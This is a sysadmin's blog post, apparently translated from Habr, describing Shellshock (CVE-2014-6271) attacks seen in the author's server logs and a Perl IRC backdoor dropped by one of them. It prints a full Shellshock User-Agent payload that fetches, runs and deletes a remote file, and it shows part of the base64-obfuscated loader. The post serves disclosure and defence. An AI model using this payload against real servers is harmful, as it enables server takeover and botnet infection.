Start of active use of ShellShock

Good time% username%! I want to tell a story about how my server is being attacked every day through CVE-2014-6271 (shellshock). For those who suddenly lost sight of this, two publications on Habré: “CVE-2014-6271, CVE-2014-7169: remote code execution in Bash” and “New dangerous vulnerability ShellShock allows you to attack many devices, from smartphones to industrial servers .

So, after the information got into public access, I began to see server requests in the server logs, where the headers contained a call to bash. At first, these were innocuous requests, where the referer and UserAgent http requests contained a call from bash ping xxx.xxx.xxx.xxx — you can guess that this is already a search for potential victims.
')
Tonight it became much more interesting. Checking the server logs, I came across such a request:

...
UserAgent: () { :;}; /bin/bash -c "wget -O /var/tmp/ec.z 74.YYY.YYY.YY/ec.z;chmod +x /var/tmp/ec.z;/var/tmp/ec.z;rm -rf /var/tmp/ec.z*"
...
(With the help of wget, we download the file from the remote server, set the execution rights, run, delete).
(Ip address specifically jammed).

Obviously, this is a matter of massively infecting servers with bots.

Well, download this file, it turned out to be a perl script. Having driven it through virustotal, we see only one operation:

Sophos - Mal / PerlBot-A

The rest say that everything is OK.

Well, we'll see. Opening the file in a text editor, we see:

#!/usr/bin/perl
use MIME::Base64;
eval(decode_base64(('IyEvdXNyL2Jpbi9wZXJsDQojIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMj ..... MjIyMjIyMjIyMNCg=='));)


Here everything is immediately clear, a typical reception of code hiding. Well, decode base64 and get the following:

##
## perlBot v1.02012 By unknown @unknown ## [ Help ] ####################################
##


Now everything is clear. Another backdoor for remote control. Managed via IRC. I am not very familiar with perl, but having run through the file it is noticeable that its functionality includes elevating rights (through picking the root password, the dictionary is rather small), flooding, and running some utilities (mail, portscan, raising dns).

In conclusion, I would like to give advice to novice system administrators.

Watch your wards! If you think that bash is not involved in your systems in any way, you can make a big mistake.

Bash is used in Apache (mod_cgi, mod_cgid), DHCP clients, OpenSSH, as well as Git, Subversion, and, of course, your router can also be vulnerable.

On github, there are plenty of public repositories for conducting attacks, apart from the fact that it is so easy to exploit this vulnerability that any novice pest can handle.

Related Links

Information about PerlBot (modification) [EN] ;
Article from DigitalOcean how to protect against Shellshock [EN] .